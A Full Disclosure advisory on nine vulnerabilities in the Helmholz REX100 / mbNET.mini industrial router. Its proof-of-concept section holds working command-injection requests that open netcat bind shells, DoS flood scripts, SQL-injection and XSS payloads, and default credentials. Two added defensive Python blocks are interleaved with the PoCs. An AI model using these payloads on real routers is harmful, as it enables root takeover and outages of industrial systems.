Message-ID: <PAXP190MB1647661530A87AD635D7A749FE5CA@PAXP190MB1647.EURP190.PROD.OUTLOOK.COM>
Date: Thu, 24 Jul 2025 10:16:45 +0000
From: Thomas Weber | CyberDanube via Fulldisclosure
 <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] St. Pölten UAS 20250721-0 | Multiple Vulnerabilities in Helmholz Industrial Router REX100 / mbNET.mini

St. Pölten UAS 20250721-0
-------------------------------------------------------------------------------
                title| Multiple Vulnerabilities in REX100
              product| Helmholz Industrial Router REX100 / mbNET.mini
   vulnerable version| < 2.3.3
        fixed version| 2.3.3
           CVE number| CVE-2025-41673, CVE-2025-41674, CVE-2025-41675,
                     | CVE-2025-41676, CVE-2025-41677, CVE-2025-41678,
                     | CVE-2025-41679, CVE-2025-41680, CVE-2025-41681
               impact| High
             homepage| https://www.helmholz.de/
                     | https://mbconnectline.com/
                found| 2025-04-25
                   by| F. Bruckmoser, M. Eder, J. Heigl, M. Heudorn,
                     | G. Hofmarcher, M. Kadlec, M. Pristauz-Telsnigg,
                     | S. Resch, P. Schweinzer, M. Gschiel
                     |
                     | These vulnerabilities were discovered during research at
                     | St. Pölten UAS, supported and coordinated by CyberDanube.
                     |
                     | https://fhstp.ac.at | https://cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"Helmholz is your specialist when it comes to sophisticated products for your
automation projects. With current, clever system solutions from Helmholz, the
high demands placed on industrial networks in times of increasing automation
can be met both reliably and efficiently - including a high level of operating
convenience. The broad product spectrum ranges from a decentralized I/O system
to switches and repeaters, gateways, a NAT gateway/firewall and secure IoT
remote machine access."

Source: https://www.helmholz.de/en/company/about-helmholz/


Vulnerable versions
-------------------------------------------------------------------------------
Helmholz Industrial Router REX100 < 2.3.3
MBConnectline mbNET.mini < 2.3.3


Vulnerability overview
-------------------------------------------------------------------------------
1) Authenticated Command Injection via send_sms (CVE-2025-41674)
A command injection vulnerability has been identified in the send_sms
functionality of the device. An authenticated attacker can exploit this issue
to execute arbitrary commands as root on the device.

2) Authenticated Command Injection via diag (CVE-2025-41673)
A command injection vulnerability has been identified in the diag
functionality of the device. An authenticated attacker can exploit this issue
to execute arbitrary commands as root on the device.

3) Authenticated Command Injection via communication.sh (CVE-2025-41675)
A command injection vulnerability has been identified in the communication.sh
endpoint of the device. An authenticated attacker can exploit this issue to
execute arbitrary commands as root on the device.

4) Authenticated Denial of Service via send_sms (CVE-2025-41677)
A denial of service condition has been identified in the send_sms functionality
of the device. An authenticated attacker can exploit this issue to make the
device unresponsive until reboot.

5) Authenticated Denial of Service via send_mail (CVE-2025-41676)
A denial of service condition has been identified in the send_mail
functionality of the device. An authenticated attacker can exploit this issue
to make the device unresponsive until reboot.

6) Authenticated SQL Injection via cloud-status.sh (CVE-2025-41678)
A SQL injection has been identified in the cloud-status.sh endpoint of the
device. The issue can be exploited by an authenticated attacker to read out or
modify the SQLite database of the device.

7) Unauthenticated Buffer Overflow via confnet/serial (CVE-2025-41679)
A buffer overflow issue exists in the confnet service in the "serial" function
of the device. An unauthenticated attacker can exploit this issue to crash the
service or gain remote code execution on the device.

8) Unauthenticated Buffer Overflow via confnet/command (CVE-2025-41679)
A buffer overflow issue exists in the confnet service in the "command" function
of the device. An unauthenticated attacker can exploit this issue to crash the
service or gain remote code execution on the device.

9) Authenticated Persistent XSS via cloud-configure.sh (CVE-2025-41681)
A persistent XSS vulnerability has been identified in the cloud-configure.sh
endpoint of the device. An authenticated attacker can abuse this issue to
execute malicious JavaScript in the victim's browser when using the web service
of the device.


Proof of Concept
-------------------------------------------------------------------------------
1) Authenticated Command Injection via send_sms (CVE-2025-41674)
The action send_sms in the file /cgi-bin/cloud-status.sh is vulnerable to a
command injection. The following POST request can be used to create the file
/hello.txt:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /cgi-bin/api.sh HTTP/1.1
Host: 10.69.43.18
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:138.0) Gecko/20100101
Firefox/138.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: http://10.69.34.3
DNT: 1
Sec-GPC: 1
Authorization: Basic <redacted>
Connection: keep-alive
Referer: http://10.69.34.3/cgi-bin/cloud-status.sh
action=send_sms&numb='test'&text='test$(echo helloThere > /hello.txt)'


-------------------------------------------------------------------------------
2) Authenticated Command Injection via diag (CVE-2025-41673)
The action diag in the file /cgi-bin/cloud-status.sh is vulnerable to a command
injection. The following POST request can be used to start a bind shell on
port 8080:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /cgi-bin/api.sh HTTP/1.1
Host: 10.69.45.3
Content-Length: 71
Authorization: Basic <redacted>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
action=diag&operation=portcheck&parameter=-l -w 9999 -p 8080 -e /bin/sh


-------------------------------------------------------------------------------
3) Authenticated Command Injection via communication.sh (CVE-2025-41675)
The action nc in the file communication.sh is vulnerable to a command injection.
The following GET request can be used to start a bind shell on port 1337:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
curl 'http://192.168.0.100/cgi-bin/cloudsvr/communication.sh?action=nc&parameter=-l%20-p%201337%20-e%20%2Fbin%2Fsh' \
  -H 'Authorization: Basic aGVsbWhvbHo6cm91dGVy' \
  --insecure
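
Added defensive example, not part of the advisory: the three command injections above (items 1 to 3) all arrive as form parameters to the device's CGI endpoints, so a proxy or WAF in front of the router can flag them before they reach a shell. The following Python checks parsed parameters for shell metacharacters in the send_sms/send_email fields and for option-style values handed to the diag portcheck and nc actions; the sample requests are constructed from the PoC bodies, and the set of shell-backed actions is an assumption drawn from the advisory rather than from knowledge of the firmware.

```python
import re
from urllib.parse import parse_qs

# Constructed sample requests: three modelled on the advisory's PoC bodies for
# items 1 to 3 and two benign ones. Not captured traffic from any device.
SAMPLE_REQUESTS = [
    ("POST", "/cgi-bin/api.sh",
     "action=send_sms&numb='test'&text='test$(echo helloThere > /hello.txt)'"),
    ("POST", "/cgi-bin/api.sh",
     "action=diag&operation=portcheck&parameter=-l -w 9999 -p 8080 -e /bin/sh"),
    ("GET", "/cgi-bin/cloudsvr/communication.sh",
     "action=nc&parameter=-l%20-p%201337%20-e%20%2Fbin%2Fsh"),
    ("POST", "/cgi-bin/api.sh",
     "action=send_sms&numb=%2B4312345678&text=Pump+3+alarm+cleared"),
    ("POST", "/cgi-bin/api.sh",
     "action=diag&operation=portcheck&parameter=plc.example.local"),
]

# Characters that let a value break out of a shell command line.
SHELL_META = re.compile(r"[;&|`<>\n]|\$\(|\$\{")
# Actions the advisory shows passing their parameters to a shell (assumed list).
SHELL_BACKED_ACTIONS = {"send_sms", "send_email", "diag", "nc"}
# Actions whose parameter lands on a network tool's command line, where a
# leading "-" turns a hostname into an option such as nc's -e.
TOOL_ACTIONS = {"diag", "nc"}


def analyse_request(method, path, query_or_body):
    """Return a list of findings for one request; an empty list means clean."""
    if not path.startswith("/cgi-bin/"):
        return []
    params = {k: v[0] for k, v in
              parse_qs(query_or_body, keep_blank_values=True).items()}
    action = params.get("action", "")
    if action not in SHELL_BACKED_ACTIONS:
        return []
    findings = []
    for name, value in params.items():
        if name == "action":
            continue
        if SHELL_META.search(value):
            findings.append(f"{action}.{name}: shell metacharacters in {value!r}")
        if action in TOOL_ACTIONS and value.lstrip().startswith("-"):
            findings.append(
                f"{action}.{name}: option-style value fed to a network tool: {value!r}")
    return findings


def scan(requests):
    """Map request index to findings for every request that triggered a rule."""
    hits = {}
    for i, (method, path, data) in enumerate(requests):
        findings = analyse_request(method, path, data)
        if findings:
            hits[i] = findings
    return hits
```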


-------------------------------------------------------------------------------
4) Authenticated Denial of Service via send_sms (CVE-2025-41676)
The action send_sms is vulnerable to a denial of service condition. When many
requests are sent in parallel, the system becomes unresponsive.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import requests
from concurrent.futures import ThreadPoolExecutor

HOST = "10.69.43.18"
PATH = "/cgi-bin/api.sh"
LENGTH = 512
ATTACKS = 1000

param = {
    'action': 'send_sms',
    'numb': 'X' * LENGTH,
    'text': 'X' * LENGTH,
}
url = f'http://{HOST}{PATH}'

def send_request(i):
    with requests.Session() as s:
        s.auth = ('helmholz', 'router')
        print(f'[+] - Sending Packet NR {i+1}...')
        s.post(url, data=param)

with ThreadPoolExecutor(max_workers=ATTACKS) as executor:
    executor.map(send_request, range(ATTACKS))


-------------------------------------------------------------------------------
5) Authenticated Denial of Service via send_mail (CVE-2025-41677)
The action send_mail is vulnerable to a denial of service condition. When many
requests are sent in parallel, the system becomes unresponsive.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/env python3
import requests
from concurrent.futures import ThreadPoolExecutor

HOST = "10.69.43.18"
PATH = "/cgi-bin/api.sh"
LENGTH = 24
ATTACKS = 5000

param = {
    'action': 'send_email',
    'addr': 'X' * LENGTH,
    'subj': 'X' * LENGTH,
    'text': 'X' * LENGTH
}

url = f'http://{HOST}{PATH}'

def send_request(i: int) -> None:
    try:
        with requests.Session() as session:
            session.auth = ('helmholz', 'router')
            print(f'[+] Sending packet #{i + 1} ...')
            session.post(url, data=param, timeout=10)
    except requests.RequestException as exc:
        print(f'[-] Packet #{i + 1} failed: {exc}')

def main() -> None:
    with ThreadPoolExecutor(max_workers=ATTACKS) as executor:
        executor.map(send_request, range(ATTACKS))

if __name__ == "__main__":
    main()


-------------------------------------------------------------------------------
6) Authenticated SQL Injection via cloud-status.sh (CVE-2025-41678)
A SQL injection has been identified in the cloud-status.sh endpoint of the
device. An attacker could leverage this vulnerability to manipulate data inside
the SQLite database:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /cgi-bin/cloud-status.sh HTTP/1.1
Host: 10.69.35.3
Content-Length: 104
Authorization: Basic aGVsbWhvbHo6cm91dGVy
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101
Firefox/128.0
Origin: http://10.69.45.3
Referer: http://10.69.45.3/cgi-bin/cloud-status.sh
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

language=test%27%29%3B%20REPLACE%20INTO%20config%20%28name%2Cvalue%29%20VALUES%28%27hacked%27%2C%27yes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A verification shows the manipulated data:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ echo "SELECT * FROM config WHERE name = 'hacked';" | sqlite3 /etc/db/config
hacked|yes


-------------------------------------------------------------------------------
7) Unauthenticated Buffer Overflow via confnet/serial (CVE-2025-41679)
The overflow is located inside the confnet binary. For exploitation, the serial
number of the device is required. To interact with the service, the script
published by SySS has been used:
(www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-063.txt)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[+] Received response from ('192.168.0.100', 25353):
R50168542

$ python3 cve-2024-45274.py cmd
R501685420000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000 192.168.0.100 get_fw

$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[!] No response received within 3 seconds.
[!] No response received within 3 seconds.


-------------------------------------------------------------------------------
8) Unauthenticated Buffer Overflow via confnet/command (CVE-2025-41679)
The overflow is located inside the confnet binary. For exploitation, the serial
number of the device is required. To interact with the service, the script
published by SySS has been used:
(www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-063.txt)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[+] Received response from ('192.168.0.100', 25353):
R50168542

$ python3 cve-2024-45274.py cmd R50168542 192.168.0.100
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccc
ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
cccccccccccccccccccccccccccccccccccccccccccccdddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffff'

$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[!] No response received within 3 seconds.
[!] No response received within 3 seconds.


-------------------------------------------------------------------------------
9) Authenticated Persistent XSS via cloud-configure.sh (CVE-2025-41681)
A persistent XSS vulnerability has been identified in the cloud-configure.sh
endpoint of the device. An authenticated attacker can exploit this issue to
inject arbitrary JavaScript, which is executed when the "help" page is opened.
The impact of this vulnerability is very limited.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

POST /cgi-bin/cloud-status.sh HTTP/1.1
Host: 192.168.0.100
Content-Length: 250
Authorization: Basic aGVsbWhvbHo6cm91dGVy
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Accept: text/html,application/xhtml+xml,application/xml;
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Content-Disposition: form-data; name="langchange"

1
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Content-Disposition: form-data; name="language"

";alert(1)//"
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm--
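
Added example for items 6 and 9, written for this page and not taken from the vendor's firmware: both issues enter through the language parameter, so one storage-side fix covers both. The block runs the advisory's payloads against an in-memory sqlite3 table with the config(name, value) shape shown in the verification step of item 6, first through the splice-into-SQL pattern the PoC implies and then through a whitelist plus parameter binding; the statement template, the whitelist and the help_page_script encoder are assumptions.

```python
import json
import re
import sqlite3

# Constructed inputs: the advisory's two payloads for the "language" parameter.
# The config(name, value) shape is taken from the advisory's sqlite3
# verification step; the statement template and whitelist are assumptions.
SQLI_PAYLOAD = "test'); REPLACE INTO config (name,value) VALUES('hacked','yes"
XSS_PAYLOAD = '";alert(1)//"'
ALLOWED_LANGUAGES = {"de", "en"}  # assumed; the device's real list is unknown
LANGUAGE_RE = re.compile(r"^[a-z]{2}(?:_[A-Z]{2})?$")


def open_config_db():
    """In-memory stand-in for the device's sqlite config database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE config (name TEXT PRIMARY KEY, value TEXT)")
    db.execute("INSERT INTO config VALUES ('language', 'en')")
    return db


def set_language_unsafe(db, language):
    """The pattern the PoC implies: the value is spliced into SQL text and the
    result is run as a script, as when piping into the sqlite3 CLI, so the
    second statement smuggled in by the payload executes too."""
    db.executescript(
        f"REPLACE INTO config (name,value) VALUES('language','{language}');")


def set_language_safe(db, language):
    """Hardened: accept only a whitelisted code, then bind it as a parameter so
    it is never parsed as SQL. Returns True when the value was stored."""
    if not LANGUAGE_RE.match(language) or language not in ALLOWED_LANGUAGES:
        return False
    db.execute("REPLACE INTO config (name,value) VALUES ('language', ?)",
               (language,))
    db.commit()
    return True


def config_value(db, name):
    row = db.execute("SELECT value FROM config WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None


def help_page_script(language):
    """Defence in depth for the help page (item 9): emit the stored value into
    a JS string context JSON-encoded, which escapes the double quote the XSS
    payload relies on; '<' is escaped too so '</script>' cannot close the tag."""
    return "var lang = " + json.dumps(language).replace("<", "\\u003c") + ";"
```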


-------------------------------------------------------------------------------
The vulnerabilities were manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.re).


Solution
-------------------------------------------------------------------------------
Update to the latest version.


Workaround
-------------------------------------------------------------------------------
Limit network access to the device or remove it if possible.


Recommendation
-------------------------------------------------------------------------------
St. Pölten UAS recommends that Helmholz customers upgrade the firmware to the
latest available version. It is advised to have a security assessment performed
by a professional company.


Contact Timeline
-------------------------------------------------------------------------------
2025-06-11: Contacting Helmholz via psirt@...mholz.de.
2025-06-16: Contacting them again as their PGP setup was broken.
            Sending them the advisory via secure channel.
2025-06-17: Response from manufacturer mbconnectline. Vulnerabilities are
            reproducible and are present in latest firmware.
2025-07-21: Coordinated release with PSIRT@VDE and Helmholz.


Web: https://www.fhstp.ac.at/
Twitter: https://x.com/fh_stpoelten
Mail: mis@...tp.ac.at

EOF S. Dietz / @2025
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
